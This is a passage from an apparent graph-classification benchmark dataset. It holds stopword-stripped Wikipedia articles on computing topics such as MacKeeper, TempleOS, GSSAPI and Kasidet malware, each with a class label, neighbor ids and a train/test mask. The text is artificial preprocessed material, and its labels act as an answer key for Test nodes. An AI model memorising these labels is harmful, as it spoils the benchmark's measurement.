    "text": "MacKeeper:mackeeper mackeeper utility software distributed kromtech alliance known heavily promoted aggressive advertising affiliate marketing mackeeper faced class-action lawsuit company allegedly deceived users paying unneeded fixes lawsuit settled 2015 us 2 million without admission guilt company five major versions mackeeper released first beta version mackeeper 0.8 released 13 may 2010 mackeeper 1.0 released october 26 2010 mackeeper 2.0 released 30 january 2012 macworld – iworld expanded number utilities related security data control cleaning optimization kromtech alliance acquired mackeeper zeobit april 2013 mackeeper 3.0 released june 2014 software service new human expert feature optimization os x yosemite july 2018 mackeeper 4.0 released mackeeper initially developed 2009 zeobit april 2013 zeobit sold mackeeper kromtech alliance corp. kromtech closely affiliated zeobit ukraine hired many former kiev-based zeobit employees december 2015 security researcher chris vickery discovered publicly accessible database 21gb mackeeper user data internet exposing usernames passwords information 13 million mackeeper users according kromtech result server misconfiguration error fixed within hours discovery integrates avira anti-malware scanning engine versions opened critical security hole filesystem-level encryption tool encrypt files folders password data recovery utility permits users recover unintentionally deleted files backup software also included copy files usb flash drive external hdd ftp server data erasure permits users permanently delete files although pc world argues feature duplicates secure empty trash feature formerly built macos disk cleaner finds removes junk files hard drive order free space earlier bundles received mixed reviews reviewers divided effectiveness software macworld gave mackeeper 3.5 5 stars august 2010 based 0.9.6 build program found reasonably priced set tools experienced lagging switching tools maclife rated 2.5 5 said useful mainly freeing drive space found features offered inconsistent results believed users ’ need antivirus feature av-comparatives found mackeeper excellent ability detect mac-based malware noted well suited enthusiasts good understanding security issues ideal non-expert users need pre-configured optimal security macs opswat awarded program gold certification protecting users anti-phishing attempts well spyware malware zeobit claims negative attacks launched mackeeper unnamed competitor many users press confusing mackeeper another application reviews latest software version largely negative may 2015 test pc world found mackeeper identified need extensive corrections brand new fully patched machines december 2015 business insider imore suggested users avoid product install top ten reviews removed mackeeper top 10 ranking noting software features competitors performance mac malware identification tests showed software better detection rates resulting score 7.5 10 july 2017 av-test assessment found mackeeper detected 85.9 percent tested malware mackeeper criticized difficult uninstall tom guide macworld published how-to guides deleting software according macworld users frequently ask get rid mackeeper sophos malwarebytes competing vendors kromtech anti-virus software market identified mackeeper potentially unwanted program sophos reported mackeeper 2017 prolific macos potentially unwanted program macworld observed aggressive mackeeper advertising leads people believe software either malware scam neither macworld also notes pop-up pop-under ads may due third-party installers computerworld described mackeeper virulent piece software promises cure mac woes instead makes things much worse softonic.com described software perfect genuinely useful also noting mackeeper exaggerates threat associated user security app multiple reviewers criticized zeobit marketing promotional techniques kromtech buys upwards 60 million ad impressions month making one largest buyers web traffic aimed mac users zeobit accused employing misleading advertising regard promotion mackeeper including aggressive affiliate marketing pop-under ads planting sockpuppet reviews well websites set discredit competitors kromtech also issues affiliate advertisers attracted 50 percent commissions kromtech pays sales mackeeper wrapped mackeeper ads adware 2018 kromtech began take steps affiliate marketers said scamming users january 2014 class action lawsuit filed zeobit illinois lawsuit alleged neither free trial full registered versions mackeeper performed credible diagnostic testing reported consumer mac need repair at-risk due harmful error may 2014 lawsuit filed zeobit pennsylvania alleging mackeeper fakes security problems deceive victims paying unneeded fixes 10 august 2015 zeobit settled class action lawsuit customers bought mackeeper 8 july 2015 apply get refund kromtech also filed least two unsuccessful lawsuits perceives defaming july 2013 kromtech filed lawsuit macpaw developers cleanmymac kromtech alleged macpaw employees created several usernames posts several websites defaming mackeeper software case dismissed hearing year later 2014 kromtech filed lawsuit david a. cox alleging defamed kromtech calling mackeeper fraudulent application youtube video judge dismissed case lack personal jurisdiction july 2016 kromtech sent cease desist letter luqman wadood 14-year old technology reviewer alleged harassment slander mackeeper brand number youtube videos luqman said videos diplomatic",
    "neighbors": [
      9025,
      4994,
      6309,
      11368,
      9771,
      3885,
      8493,
      7983,
      4464,
      467,
      4889,
      1242,
      7515,
      11225,
      9055
    ],
    "mask": "None"
  },
  {
    "node_id": 4660,
    "label": 5,
    "text": "Mail_Transfer_Protocol:mail transfer protocol mail transfer protocol mtp obsolete network protocol defined rfc 780 used reliably transfer email tcp udp ports 57 allocated mtp allocation removed iana simple mail transfer protocol smtp defined rfc 788 replaced mail transfer protocol",
    "neighbors": [
      6993,
      10924,
      9909,
      11413
    ],
    "mask": "None"
  },
  {
    "node_id": 4661,
    "label": 5,
    "text": "Galeon:galeon galeon discontinued gecko-based web browser created marco pesenti gritti goal delivering consistent browsing experience gnome desktop environment gained popularity early 2000s due speed flexibility configuration features disagreement future galeon split development team 2002 resulted departure browser initial author several developers event marked beginning browser popularity decline led discontinuation september 2008 galeon features subsequently ported epiphany called web – descendant galeon galeon made use gecko features including configuration options standards support apart galeon several features uncommon browsers time project started marco pesenti gritti goal creating web browser would fast consistent gnome desktop environment first public version galeon 0.6 released june 2000 first releases galeon criticised lack basic features cookie proxy support though browser added features every release version 1.2 galeon introduced many new features drew attention general public time galeon creation popular linux browsers including netscape mozilla large multi-functional programs made slow start often impractical due high memory usage processor requirements opera somewhat faster proprietary software distributed trialware adware versions lacked functionality microsoft windows version galeon widely seen one best linux browsers available polls revealed substantial usage share galeon though popularity regarded owing lack stability evident mozilla browsers release new version gtk+ widget toolkit used construct user interface galeon team decided write new version galeon scratch time gnome project adopted new human interface guidelines promoted simplicity uniform design galeon team differing opinions new guidelines author lead developer marco pesenti gritti endorsed saw rewrite opportunity make galeon simpler many developers believed reducing number preferences simplifying user interface would harm project november 2002 result several discussions topic gritti made decision cease work galeon fork project started development hig-compliant web browser called epiphany known web gritti longer controlled development galeon previous functionality restored subsequent releases new features added though development got slow split time rising popularity firefox status default browser major distribution overwhelming number extensions led decline galeon user base eventually galeon developers announced plans halt development galeon saying current approach unsustainable regarding resources required maintain instead planned develop set extensions epiphany provide similar functionality even development ceased september 2008 browser remained popular december 2011 still available linux distribution repositories debian 6 squeeze although part debian 7 wheezy galeon praised customizability speed compared netscape navigator firefox though konqueror opera still faster older hardware galeon noted session handling crash recovery november 2002 osnews conducted poll determine popular gecko-based browser included several browsers microsoft windows mac os x linux n't include netscape navigator mozilla suite linux-only galeon second popular cross-platform firefox time known phoenix critics noted galeon tricky plugin installation",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      559,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      9987,
      7943,
      1807,
      5397,
      278,
      3350,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      10060,
      2893,
      11112,
      877,
      8557,
      3961,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4662,
    "label": 0,
    "text": "Sentence_extraction:sentence extraction sentence extraction technique used automatic summarization text shallow approach statistical heuristics used identify salient sentences text sentence extraction low-cost approach compared knowledge-intensive deeper approaches require additional knowledge bases ontologies linguistic knowledge short sentence extraction works filter allows important sentences pass major downside applying sentence-extraction techniques task summarization loss coherence resulting summary nevertheless sentence extraction summaries give valuable clues main points document frequently sufficiently intelligible human readers usually combination heuristics used determine important sentences within document heuristic assigns positive negative score sentence heuristics applied highest-scoring sentences included summary individual heuristics weighted according importance seminal papers laid foundations many techniques used today published hans peter luhn 1958 h. p edmundson 1969 luhn proposed assign weight sentences beginning document paragraph edmundson stressed importance title-words summarization first employ stop-lists order filter uninformative words low semantic content e.g grammatical words also distinguished bonus words stigma words i.e words probably occur together important e.g word form significant unimportant information idea using key-words i.e words occur significantly frequently document still one core heuristics today summarizers large linguistic corpora available today tf–idf value originated information retrieval successfully applied identify key words text example word cat occurs significantly often text summarized tf term frequency corpus idf means inverse document frequency corpus meant document cat likely important word text text may fact text cats",
    "neighbors": [
      5122,
      2440,
      2059,
      6798,
      11538,
      1044,
      5399,
      538,
      7599,
      4531,
      3127,
      2488,
      10557,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      7780,
      7918,
      8046,
      8688,
      10231,
      8440,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 4663,
    "label": 2,
    "text": "Generic_Security_Services_Application_Program_Interface:generic security services application program interface generic security service application program interface gssapi also gss-api application programming interface programs access security services gssapi ietf standard addresses problem many similar incompatible security services use today gssapi provide security instead security-service vendors provide gssapi implementations usually form libraries installed security software libraries present gssapi-compatible interface application writers write application use vendor-independent gssapi security implementation ever needs replacing application need rewritten definitive feature gssapi applications exchange opaque messages tokens hide implementation detail higher-level application client server sides application written convey tokens given respective gssapi implementations gssapi tokens usually travel insecure network mechanisms provide inherent message security exchange number tokens gssapi implementations ends inform local application security context established security context established sensitive application messages wrapped encrypted gssapi secure communication client server typical protections guaranteed gssapi wrapping include confidentiality secrecy integrity authenticity gssapi also provide local guarantees identity remote user remote host gssapi describes 45 procedure calls significant ones include gssapi standardized c rfc 2744 language java implements gssapi jgss java generic security services application program interface limitations gssapi include standardizes authentication authorization assumes client–server architecture anticipating new security mechanisms gssapi includes negotiating pseudo mechanism spnego discover use new mechanisms present original application built dominant gssapi mechanism implementation use kerberos unlike gssapi kerberos api standardized various existing implementations use incompatible apis gssapi allows kerberos implementations api compatible",
    "neighbors": [
      7,
      10631,
      4242,
      3477,
      2080,
      2083,
      9635,
      2087,
      5677,
      2737,
      10167,
      5433,
      5568,
      961,
      9665,
      7368,
      10058,
      6098,
      8539,
      6750,
      2143,
      8670,
      2274,
      10341,
      6888,
      2027,
      1012,
      2804,
      2045,
      10366
    ],
    "mask": "Train"
  },
  {
    "node_id": 4664,
    "label": 3,
    "text": "SPARC_T4:sparc t4 sparc t4 sparc multicore microprocessor introduced 2011 oracle corporation processor designed offer high multithreaded performance 8 threads per core 8 cores per chip well high single threaded performance chip chip 4th generation processor t-series family sun microsystems brought first t-series processor ultrasparc t1 market 2005 chip first sun/oracle sparc chip use dynamic threading out-of-order execution incorporates one floating point unit one dedicated cryptographic unit per core cores use 64-bit sparc version 9 architecture running frequencies 2.85 ghz 3.0 ghz built 40 nm process die size eight core eight thread per core chip built 40 nm process running 2.5 ghz described sun microsystems processor roadmap 2009 codenamed yosemite falls given expected release date late 2011 processor expected introduce new microarchitecture codenamed vt core online technology website register speculated chip would named t4 successor sparc t3 yosemite falls cpu product remained oracle corporation processor roadmap company took sun early 2010 december 2010 t4 processor confirmed oracle vp hardware development designed improved per-thread performance eight cores expected release within one year processor design presented 2011 hot chips conference cores renamed s3 vt included dual-issue 16 stage integer pipeline 11-cycle floating point pipeline giving improvements previous s2 core used sparc t3 processor core associated 16 kb data 16 kb instruction l1 caches unified 128 kb l2 cache eight cores share 4 mb l3 cache total transistor count approximately 855 million design first sun/oracle sparc processor out-of-order execution first processor sparc t-series family include ability issue one instruction per cycle core execution units t4 processor officially introduced part oracle sparc t4 servers september 2011 initial product releases single processor t4-1 rack server ran 2.85 ghz dual processor t4-2 ran 2.85 ghz frequency quad processor t4-4 server ran 3.0 ghz sparc s3 core also include thread priority mechanism called dynamic threading whereby thread allocated resources based need giving increased performance s3 core resources shared among active threads 8 shared resources include branch prediction structures various buffer entries out-of-order execution resources static resource allocation reserves resources threads based policy whether thread use dynamic threading allocates resources threads ready use thus improving performance cryptographic performance also increased t3 chip design improvements including new set cryptographic instructions ultrasparc t2 t3 per-core cryptographic coprocessors replaced in-core accelerators instruction-based cryptography implementation designed achieve wire speed encryption decryption sparc t4 10-gbit/s ethernet ports architectural changes claimed deliver 5x improvement single thread integer performance twice per-thread throughput performance compared previous generation t3 published specjvm2008 result 16-core t4-2 454 ops/m 321 ops/m 32-core t3-2 ratio 2.8x performance per core",
    "neighbors": [
      5378,
      9090,
      9731,
      1801,
      4235,
      6926,
      1809,
      4241,
      1818,
      8863,
      8231,
      1707,
      2731,
      10926,
      3247,
      6322,
      10675,
      4285,
      6464,
      7104,
      9665,
      9541,
      3911,
      2895,
      3919,
      597,
      731,
      6107,
      2269,
      9955,
      7270,
      11626,
      10734,
      1776,
      11636,
      630,
      1399,
      9976,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 4665,
    "label": 2,
    "text": "Benoit_Schillings:benoit schillings benoit schillings belgian software engineer distinguished engineer google x leading early projects x known one lead developers operating system beos noted amateur astronomer schillings association inc. began 1990 developer software apple macintosh visited apple expo paris met jean-louis gassée gassée left apple computer found asked schillings become second engineer would work operating system new computer called bebox schillings accepted offer starting march 1991 developed file system known old file system ofs associated user-space database application called zookeeper indexed metadata file system file system fast efficient later replaced dominic giampaolo file system schillings also developed graphics system beos known app server well programming frameworks interface kit application kit used software developers write software operating system joining trolltech october 2005 schillings worked distinguished engineer cto openwave mike reed led team developed version 7 openwave phone suite mobile phone applications benoit also ran android ios mobile teams yahoo 2013 2017",
    "neighbors": [
      3312,
      8928,
      4804,
      11118
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4666,
    "label": 3,
    "text": "Dragon_MSX:dragon msx dragon msx msx 1 home computer designed radofin creators mattel aquarius dragon data well known dragon 64 home computer clone trs-80 color computer rare prototypes ever built",
    "neighbors": [
      11657,
      1515,
      3788,
      9006,
      7983,
      1776,
      1403
    ],
    "mask": "Test"
  },
  {
    "node_id": 4667,
    "label": 9,
    "text": "Anthony_James_Barr:anthony james barr anthony james barr born september 24 1940 aka tony barr jim barr american programming language designer software engineer inventor among notable contributions statistical analysis system sas automated lumber yield optimization automated classification medical entities acme widely used internationally science government industry academia sas system founded barr 1966 september 1966 athens georgia presented conceptual ideas sas members committee statistical software university statisticians southern experiment stations usses barr earlier created analysis-of-variance modeling language inspired notation statistician maurice kendall developed assembly language ibm 1410 graduate student north carolina state university 1962 1963 dr. a. grandage author ibm 650 analysis-of-variance programs advised statistical computations followed multiple regression program flexible input format algebraic transformation variables 1963 1964 drawing programs along experience structured data files created sas placing statistical procedures formatted file framework barr experience structured data files gained working formatted file system see 1966 1968 barr developed fundamental structure language sas 1968 barr began collaboration others barr designed implemented programming language data management report writing systems areas evolving system 1976 sas institute inc. incorporated anthony j. barr james h. goodnight john p. sall jane t. helwig barr holding largest share 40 sold shares 1979 barr created acme program national center health statistics 1967 1969 acme computer program assigns one underlying cause death based multiple causes death listed death certificate acme conjunction components comprise mortality medical data system mmds system used uniformly determine underlying cause death death certificates united states acme become de facto international standard automated selection underlying cause death components mmds variations used many nations around world system provides essential data used calculating mortality statistics 1971 1972 barr along partner sandy mullin designed patented built first computerized equipment optimize usage lumber furniture industry device read marked flaws board calculated cross rip cuts required optimal board usage marked cut lines board 1973 barr-mullin inc. incorporated lumber yield optimization technology remains widely used american wood industry 1968 barr created first non-ibm linking loader ibm/360 named ldr loader sponsored american data processing inc. raleigh north carolina barr loader cut typical program testing times twenty-five percent ibm offer equivalent loader eighteen months barr loader commercially available 1971 barr created first non-ibm hasp terminal emulator marketed university computing company ucc hasp emulator gave significant performance increase ibm 2780 emulator developed ucc 1969 emulators developed pdp-8 minicomputer allowed cope terminals communicate ibm/360 ibm/370 1971 barr also implemented hasp workstation computer industries orange california implemented data general nova minicomputer program became singer corporation remote batch terminal singer ucc sold terminal divisions harris corporation continued market products 1983 barr developed hardware software performing hasp remote job entry communication ibm pc company barr systems inc. marketed sold barr hasp went implement support bisync sna sdlc workstations gateways along data communications output management products barr employed ibm federal systems division pentagon washington d.c. 1964 1966 worked nips formatted file system ffs generalized data base management system retrieval report writing one first data management systems take advantage defined file structure data storage retrieval efficiency assigned work national military command center information processing branch joint chiefs staff barr rewrote enhanced ffs implementing three five major components retrieval sorting file update work featured innovation uniform lexical analyzer languages system uniform method handling error messages working ffs introduced barr potential defined file structure become central concept sas barr born new york city grew summit new jersey graduated summit high school 1958",
    "neighbors": [
      4546,
      11236,
      8262,
      8011,
      6544,
      8732,
      3323,
      2652,
      477
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4668,
    "label": 2,
    "text": "Memory_pool:memory pool memory pools also called fixed-size blocks allocation use pools memory management allows dynamic memory allocation comparable malloc c++ operator new implementations suffer fragmentation variable block sizes recommendable use real time system due performance efficient solution preallocating number memory blocks size called memory pool application allocate access free blocks represented handles run time many real-time operating systems use memory pools transaction processing facility systems like web server nginx use term memory pool refer group variable-size allocations later deallocated also known region see region-based memory management simple memory pool module allocate example three pools compile time block sizes optimized application deploying module application allocate access free memory following interface benefits drawbacks",
    "neighbors": [
      6115,
      10883,
      3237,
      1126,
      1736,
      5074,
      6067,
      3512,
      5626,
      9628,
      10013
    ],
    "mask": "Test"
  },
  {
    "node_id": 4669,
    "label": 2,
    "text": "TempleOS:templeos templeos formerly j operating system sparrowos losethos biblical-themed lightweight operating system designed third temple prophesied bible created american programmer terry a. davis developed alone course decade series episodes later described revelation god system characterized modern x86-64 commodore 64 using interface similar mixture dos turbo c. davis proclaimed system features 640x480 resolution 16-color display single audio voice explicitly instructed god programmed original variation c named holyc place basic included original flight simulator compiler kernel templeos released 2013 last updated 2017 received largely favorable reviews tech communities davis amassed small online following died august 11 2018 terry a. davis 1969–2018 began experiencing regular manic episodes 1996 leading numerous stays mental hospitals initially diagnosed bipolar disorder later declared schizophrenic remained unemployed rest life suffered delusions space aliens government agents left briefly hospitalized mental health issues experiencing self-described revelation proclaimed direct communication god god told operating system god third temple davis began developing templeos circa 2003 one early names j operating system renaming losethos reference scene 1986 film platoon 2008 davis wrote losethos primarily making video games networking internet support far 'm concerned would reinventing wheel another name used sparrowos settling templeos mid-2013 website announced god temple finished god kills cia spreads davis died hit train august 11 2018 templeos 64-bit non-preemptive multi-tasking multi-cored public domain open source ring-0-only single address space non-networked pc operating system recreational programming os runs 8-bit ascii graphics source code 2d 3d graphics library run 640x480 vga 16 colors like modern operating systems keyboard mouse support supports iso 9660 fat32 redsea file systems last created davis support file compression according davis many specifications—such 640x480 resolution 16-color display single audio voice—were instructed god explained limited resolution make easier children draw illustrations god operating system includes original flight simulator compiler kernel one bundled program egypt game player travels burning bush use high-speed stopwatch stopwatch meant act oracle generates pseudo-random text something davis likened ouija board glossolalia example generated text follows templeos written programming language developed davis c c++ called holyc holyc variation c developed davis programming language templeos used interact shell write execute entire applications shell ide comes templeos supports several features embedding images code uses non-standard text format known doldoc support hypertext links images 3d meshes embedded otherwise regular ascii files file spinning 3d model tank comment source code code jit-compiled davis ultimately wrote 100,000 lines code os templeos received mostly favorable reviews tech journalist david cassel opined partly programming websites tried find necessary patience understanding accommodate davis techrepublic osnews published positive articles davis work even though davis banned latter hostile comments targeting readers staff review techrepublic james sanders concluded templeos testament dedication passion one man displaying technological prowess n't need anything osnews editor kroc kamen wrote os shows computing still hobby everybody serious days want code os uses interpretive dance input method allowed companies like apple damned 2017 os shown part outsider art exhibition bourogne france davis death osnews editor thom holwerda wrote davis clearly gifted programmer – writing entire operating system small feat – sad see affected mental illness one fan described davis programming legend another computer engineer compared development templeos one-man-built skyscraper engineer previously spoken davis length believed davis could steve jobs steve wozniak illness added actually boggles mind one man wrote hard lay person understand phenomenal achievement write entire operating system alone another computer engineer said templeos contained innovations developer accomplished particularly runs certain part computer processor maintain extremely quick speed",
    "neighbors": [
      1952,
      8609,
      2179,
      10851,
      5413,
      8262,
      2282,
      5356,
      7983,
      5363,
      10675,
      2045,
      6974
    ],
    "mask": "Test"
  },
  {
    "node_id": 4670,
    "label": 9,
    "text": "Frank_Pfenning:frank pfenning frank pfenning professor computer science adjunct professor department philosophy head computer science department carnegie mellon university received ph.d. carnegie mellon university department mathematics 1987 dissertation entitled proof transformations higher-order logic student peter b. andrews research includes work area programming languages logic type theory logical frameworks automated deduction trustworthy computing one principal authors twelf system also developed carnegie mellon introductory imperative programming course undergraduates c0 programming language used course 2015 named fellow association computing machinery contributions logical foundations automatic theorem proving types programming languages competitive squash player ranked top five university squash ladder",
    "neighbors": [
      5585,
      5213,
      6070,
      4791
    ],
    "mask": "Test"
  },
  {
    "node_id": 4671,
    "label": 5,
    "text": "MC-LAG:mc-lag mc-lag multi-chassis link aggregation group type link aggregation group lag constituent ports terminate separate chassis primarily purpose providing redundancy event one chassis fails ieee 802.1ax-2008 industry standard link aggregation mention mc-lag preclude implementation varies vendor notably protocol existing chassis proprietary 2012 ieee created standardized alternative mc-lag ieee 802.1aq shortest path bridging lag link aggregation group method inverse multiplexing multiple ethernet links thereby increasing bandwidth providing redundancy defined ieee 802.1ax-2008 standard states link aggregation allows one links aggregated together form link aggregation group mac client treat link aggregation group single link layer 2 transparency achieved lag using single mac address device ’ ports lag group lag configured either static dynamic dynamic lag uses peer-to-peer protocol control called link aggregation control protocol lacp lacp protocol also defined within 802.1ax-2008 standard lag implemented two ways lag n lag n+n lag n load sharing mode lag lag n+n provides worker standby flavour lag n protocol automatically distributes load balances traffic across working links within lag thus maximising use group ethernet links go come back providing improved resilience throughput different style resilience 2 nodes complete implementation lacp protocol supports separate worker/standby lag subgroups lag n+n worker links group fail standby links one links worker group fail note lacp marks links standby mode using sync flag mc-lag adds node-level redundancy normal link-level redundancy lag provides allows two nodes share common lag endpoint multiple nodes present single logical lag remote end note mc-lag implementations vendor-specific cooperating chassis remain externally compliant ieee 802.1ax-2008 standard nodes mc-lag cluster communicate synchronize negotiate automatic switchovers failover implementations may support administrator-initiated manual switchovers diagram shows four configurations ha configuration superior spanning tree load shared across links normal operation whereas spanning tree must disable links prevent loops following table lists known vendor implementations mc-lag proprietary",
    "neighbors": [
      3847,
      2184,
      7049,
      7411,
      1977
    ],
    "mask": "Test"
  },
  {
    "node_id": 4672,
    "label": 4,
    "text": "Kasidet_POS_RAM_Scraper_Malware:kasidet pos ram scraper malware kasidet pos malware variant point sale pos malware performs ddos attacks using namecoin dot-bit service scrape payment card details also known trojan.mwzlesson neutrino found september 2015 cyber security experts combination backdoor.neutrino.50 pos malware kasidet pos worm gets system along malware gets downloaded unknowingly user visits malicious websites malware different pos malware scrapes data advanced features first scrapes pos ram steals payment card details scraped information sent cyber criminal intercepted get post requests browser difficult detect bot using security programs sometimes detectable email spam campaigns exploit kits scraping capability kasidet enhanced cyber criminals hides c c server namecoin dns service dot-bit",
    "neighbors": [
      10309,
      2409,
      6091,
      6360,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 4673,
    "label": 2,
    "text": "Parabola_GNU/Linux-libre:parabola gnu/linux-libre parabola gnu/linux-libre operating system i686 x86-64 armv7 architectures based many packages arch linux arch linux arm distinguishes former offering free software includes gnu operating system components common many linux distributions linux-libre kernel instead generic linux kernel parabola listed free software foundation completely free operating system true free system distribution guidelines parabola uses rolling release model like arch regular system update needed obtain latest software development focuses system simplicity community involvement use latest free software packages parabola originally proposed members gnewsense irc channel 2009 members different arch linux communities especially spanish-speaking members started development maintenance project software documentation may 20 2011 parabola distribution recognized completely free project gnu making part fsf list free distributions february 2012 dmitrij d. czarkoff reviewed parabola osnews czarkoff reported test computer number hardware problems surfaced due lack free firmware said effectively means many devices supported parabola eg. installing acer aspire one 531h netbook could n't use broadcom bluetooth module intel wifi/wimax link 5150 adapter still could use htc magic custom gingerbread rom usb 3g/wifi modem though something always connected usb port pretty annoying laptop specifically netbook czarkoff also criticized lack documentation available parabola concluded overall impression parabola gnu/linux user experience exactly matches one arch system easy flexible installation configuration process good choice free software packages though lack documentation spoils user experience arch linux resources used configure extend distribution hardware would allow would probably stick parabola parabola used mips64el port provide support chinese loongson processor used lemote yeeloong laptop discontinued due lack resources interest final activity seen july 2014 robert rijkhoff reviewed parabola gnu/linux distrowatch september 2017 project uses 100 free software official arch repositories i686 x86-64 architectures official arch arm repositories except alarm aur armv7 uses free replacements possible linux-libre kernel instead generic linux kernel filtering process removes around 700 software packages repositories meet requirements free software definition architecture parabola established social contract parabola social contract commits project free software community viewing competing nonfree systems free culture democracy follow arch philosophy covenant included gnu free system distribution guidelines two ways install parabola either scratch using installable iso images migrating existing arch-based system latter process almost simple switching parabola repositories list talkingparabola derivative install cd based talkingarch respin parabola iso modified include speech braille output blind visually impaired users talkingparabola retains features parabola live image adds speech braille packages make possible blind visually impaired users install parabola eyes-free parabola community created number cartoon characters project characters gnu cat named bola conceived parabola main characteristics elegant minimalist lightweight",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      10257,
      8727,
      543,
      11297,
      3618,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      7234,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      9851,
      11388,
      2180,
      2692,
      7300,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10016,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      4493,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 4674,
    "label": 9,
    "text": "GW-BASIC:gw-basic gw-basic dialect basic programming language developed microsoft basica originally compaq otherwise identical microsoft/ibm basica fully self-contained executable need rom basic bundled ms-dos operating systems ibm pc compatibles microsoft microsoft also sold basic compiler bascom compatible gw-basic programs needing speed language suitable simple games business programs like since included versions ms-dos also low-cost way many aspiring programmers learn fundamentals computer programming release ms-dos 5.0 gw-basic place eventually taken qbasic interpreter part separately available quickbasic compiler ibm basica gw-basic largely ports mbasic version 5.x added features specifically ibm pc hardware common features basic-80 5.x basica/gw-basic include ability crunch program lines omitting spaces common feature earlier microsoft basic implementations removed basic-80 5.x basica/gwbasic basic-80 programs using peek/poke statements would run gw-basic basica added large number features ibm pc sound graphics memory commands features present basic-80 included ability execute rnd function parameters ability also save programs protected format preventing listed basica also allowed double-precision numbers used mathematical trigonometric functions cos sin atn n't allowed 8-bit versions basic feature normally enabled required optional parameter /d startup i.e codice_1 basic memory footprint slightly increased used microsoft offer generic version ms-dos v3.20 1986 variants operating system oem versions depending oem basic distributed either basica.exe gwbasic.exe former confused ibm basica always came .com file variants basic extra features support particular machine example tandy versions dos included special gw-basic supported enhanced sound graphics capabilities initial version gw-basic one included compaq dos 1.13 released compaq portable 1983 analogous ibm basica 1.10 used cp/m-derived file control blocks disk access support subdirectories later versions added feature improved graphics capabilities gw-basic 3.20 1986 added ega graphics support version basica gw-basic vga support effect last new version released superseded qbasic buyers hercules graphics cards received special version gw-basic card utility disk called hbasic added support 720×348 monochrome graphics versions basica/gw-basic support hercules graphics could display graphics card use third-party cga emulation simcga gw-basic command line-based integrated development environment ide based dartmouth basic using cursor movement keys line displayed screen edited also includes function key shortcuts bottom screen like early microcomputer versions basic gw-basic lacked many structures needed structured programming local variables gw-basic programs executed relatively slowly interpreted language program lines must numbered non-numbered lines considered commands direct mode executed immediately program source files normally saved binary compressed format tokens replacing keywords option save ascii text form gw-basic command-line environment commands codice_2 current program quit operating codice_3 commands also used program statements little support structured programming gw-basic codice_4 conditional statements must written one line although codice_5 statements may group multiple lines functions defined using single line codice_6 statement e.g. codice_7 data type variables specified character end variable name codice_8 string characters codice_9 integer etc groups variables also set default types based initial letter name use codice_10 etc. statements default type undeclared variables identified typing statements single-precision floating point 32-bit mbf gw-basic allowed use joystick light pen input devices gw-basic read write files com ports also event trapping ports since cassette port interface original ibm pc never implemented compatibles cassette operations supported gw-basic play simple music using codice_11 statement needing string notes represented music macro language e.g. codice_12 low-level control possible codice_13 statement takes arguments frequency hertz length clock ticks standard internal pc speaker ibm machines consequently sound limited single channel beeps whistles befits 'business machine home-based pcs like tandy 1000 allowed three channels sound codice_13 codice_11 commands several theories initials gw stand greg whitten early microsoft employee developed standards company basic compiler line says bill gates picked name gw-basic whitten refers gee-whiz basic unsure gates named program microsoft user manual microsoft press also refers name may also nicknamed gee-whiz large number graphics commands common theories initials origins include graphics windows gates william microsoft president time gates-whitten two main designers program",
    "neighbors": [
      5635,
      7691,
      22,
      4642,
      8227,
      4136,
      11315,
      6709,
      4160,
      8262,
      83,
      92,
      608,
      5733,
      8301,
      2159,
      5747,
      6778,
      2181,
      3718,
      655,
      10900,
      11412,
      10902,
      11414,
      3224,
      3736,
      9881,
      3233,
      7343,
      7355,
      7870,
      712,
      3303,
      8429,
      759,
      6910,
      6921,
      1805,
      9997,
      786,
      5395,
      11030,
      5401,
      797,
      5925,
      11559,
      2861,
      8494,
      303,
      7983,
      11570,
      315,
      7486,
      847,
      1366,
      1879,
      2401,
      2915,
      2943,
      7064,
      3481,
      1952,
      11683,
      8101,
      4010,
      10666,
      10157,
      10688,
      9166,
      11229,
      9188,
      3045,
      11243,
      2541,
      6129,
      9205,
      9212,
      10750,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 4675,
    "label": 3,
